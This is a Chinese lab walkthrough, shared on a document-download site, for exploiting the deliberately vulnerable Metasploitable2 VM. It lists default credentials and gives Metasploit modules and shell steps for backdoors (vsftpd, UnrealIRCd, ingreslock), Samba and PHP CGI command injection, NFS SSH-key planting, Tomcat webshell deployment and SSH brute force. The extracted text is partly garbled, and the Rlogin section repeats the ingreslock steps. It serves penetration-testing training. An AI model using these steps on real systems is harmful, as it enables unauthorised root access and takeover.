Metasploitable2靶机漏洞hanxuWord格式文档下载.docx
- 文档编号:22980260
- 上传时间:2023-02-06
- 格式:DOCX
- 页数:30
- 大小:1.48MB
Metasploitable2靶机漏洞hanxuWord格式文档下载.docx
《Metasploitable2靶机漏洞hanxuWord格式文档下载.docx》由会员分享,可在线阅读,更多相关《Metasploitable2靶机漏洞hanxuWord格式文档下载.docx(30页珍藏版)》请在冰豆网上搜索。
4.
5.相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/service
MySQL弱密码登录
1.在kali上执行mysql–h7.7.5.251–uroot
2.登录成功,进入mysql系统
3.
PostgreSQL弱密码登录
1.在kali上执行psql–h7.7.5.251–Upostgres
2.输入密码postgres
3.登录成功,进入postgresql系统
VNC弱密码登录
1.在kali图形界面的终端中执行vncviewer7.7.5.251
2.输入密码password
5.
攻击样本
对应规则
友商防护能力
SambaMS-RPCShell命令注入漏洞
CVE-2007-2447
BID-23972
OSVDB-34700
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
http:
//samba.org/samba/security/CVE-2007-2447.html
XeroxWorkCentrePro
XeroxWorkCentre
VMWareESXServer
TurbolinuxServer/Personal/Multimedia/Home/Desktop/Appliance/FUJI
TrustixSecureLinux
SUSELinuxEnterprise
SunSolaris
SlackwareLinux
RedHatEnterprise
MandrivaLinux
MandrakeSoftCorporateServer
HPHP-UX
GentooLinux
DebianLinux
AppleMacOSX
Kali,Metasploit
1.在kali中执行msfconsole,启动metasploit
2.useexploit/multi/samba/usermap_script,选择漏洞
3.setRHOST7.7.5.251,设置要攻击的机器IP
4.exploit,开始攻击
5.利用成功,执行uname–a验证
6.
Vsftpd源码包后门漏洞
BID-48539
OSVDB-73573
在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:
)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
Vsftpdserverv2.3.4
2.useexploit/unix/ftp/vsftpd_234_backdoor,选择漏洞
UnrealIRCd后门漏洞
CVE-2010-2075
BID-40820
OSVDB-65445
在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
UnrealUnrealIRCd3.2.8.1
2.useexploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞
LinuxNFS共享目录配置漏洞
无
NFS服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登陆。
所有Linux系统的NFS服务
1.在kali上执行命令行rpcinfo–p7.7.5.251,查看nfs服务有无开启:
2.用showmount-e7.7.5.251查看其设置的远程共享目录列表:
3.输入ssh-keygen生成rsa公钥:
4.依次输入
●mount–tnfs7.7.5.251:
//tmp/t00l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;
注:
如果提示下图中错误则需要/etc/init.d/rpcbindstart来启动mount
●cat/root/.ssh/id_rsa.pub>
>
/tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;
●sshroot@7.7.5.251,实现无密码登陆
JavaRMISERVER命令执行漏洞
17535
JavaRMIServer的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行
OracleJavaRMIServer
Metasploit
1.Nmap–p0-655357.7.5.251来查看1099端口是否开启
2.依次输入以下命令:
●useexploit/multi/misc/java_rmi_server
●setRHOST7.7.5.251(靶机IP)
●exploit
●shell(进入meterpreter时执行)
然后即可获得shell了
Tomcat管理台默认口令漏洞
Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.
Tomcat
Nessus
JSPwebshell
1.访问7.7.5.251:
8081,点击tomcatmanager,输入tomcat/tomcat,即可进入管理台
2.在自己机器上准备好JSPwebshell(liuz.jsp),通过jar–cvf来打包成liuz.war
3.通过tomcat管理台deploy刚才打包的liuz.war
4.打包成功可以看到应用目录生成(/liuz)
5.访问7.7.5.251/liuz/liuz.jsp得到webshell
Root用户弱口令漏洞(SSH爆破)
靶机root用户存在弱口令漏洞,在使用指南里并没有指出。
.
Linux
metasploit
1.输入nmap–sV–O7.7.5.251,查看SSH端口是否开启:
2.打开metasploitframework依次输入:
useauxiliary/scanner/ssh/ssh_login
setRHOSTS7.7.5.251
setUSERNAMEroot
setPASS_FILE/tmp/r00t/pass.txt(字典文件,需要预先生成)
setTHREADS50
run
root口令爆破成功,口令为root
3.sshroot@7.7.5.251成功登陆:
Distcc后门漏洞
CVE-2004-2687
OSVDB-13378
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode1.5版本及其他版本的distcc2.x版本配置对于服务器端口的访问不限制。
//cve.mitre.org/cgi-bin/cvename.cgi?
name=2004-2687
distcc2.x
2.msf>
useexploit/unix/misc/distcc_exec,选择漏洞
5.利用成功,执行id查看权限,uname–a验证服务器信息
Sambasysmlink默认配置目录遍历漏洞
CVE-2010-0926
33598
OSVDB-62145
Samba是一套实现SMB(servermessagesblock)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接,可以进行目录遍历以及访问任意文件。
before3.3.11,3.4.xbefore3.4.6,and3.5.xbefore3.5.0rc3
2.useauxiliary/admin/smb/samba_symlink_traversal,选择漏洞
4.msfauxiliary(samba_symlink_traversal)>
setSMBSHAREtmp设置SAM可写文件
5.exploit,开始攻击
6.root@yd0str:
~#smbclient//7.7.5.251/tmp在新窗口下执行smbclient命令打开上面生成的共享目录
7.smb:
\>
cdrootfs进入rootfs目录
8.smb:
\rootfs\>
ls执行ls命令列出目录,
9.smb:
more/etc/passwd列出密码文件,利用成功
10.
11.
PHPCGI参数注入执行漏洞
CVE-2012-1823
OSVDB-81633
CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
http:
//www.osvdb.org/81633
//www.osvdb.org/93979
//www.exploit-
before5.3.12and5.4.xbefore5.4.2
useexploit/multi/http/php_cgi_arg_injection,选择漏洞
5.meterpreter>
ls获得meterpreter,可执行ls列出目录确认承认
Druby远程代码执行漏洞
CVE-2013-0156(类似)
Druby配置不当,被滥用执行命令(DistributedRubyorDRballowsRubyprogramstocommunicatewitheachotheronthesamemachineoroveranetwork.DRbusesremotemethodinvocation(RMI)topasscommandsanddatabetweenprocesses)
//www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
Ruby1.8
1.root@yd0str:
~#nmap-p0-65535-sS-sV7.7.5.251,NMAP扫描端口及端口应用
(或者amap-bqv7.7.5.2518787)
2.在kali中执行msfconsole,启动metasploit
3.发现8787druby端口
4.msf>
searchdrb搜索dbr相关漏洞
5.msf>
useexploit/linux/misc/drb_remote_codeexec使用漏洞
6.setURIdruby:
7.7.5.255:
8787,设置要攻击的机器的druby链接
7.exploit,开始攻击
8.输入id,uname-a确认
9.
Ingreslock后门漏洞
Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限
Kali
1.在kali中执行命令行telnet7.7.5.2511524
2.获得root权限
3.执行uname–a验证
Rlogin后门漏洞
TCP端口512,513和514为著名的rlogin提供服务。
在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts++)。
要利用这个配置,确保rsh客户端已经安装(在linux操作系统上安装例如OpenSSH),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH(DebianGNU/Linux也是如此)。
5.在kali中执行命令行telnet7.7.5.2511524
6.获得root权限
7.执行uname–a验证
8.
(注:
可编辑下载,若有不当之处,请指正,谢谢!
)
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Metasploitable2 靶机 漏洞 hanxu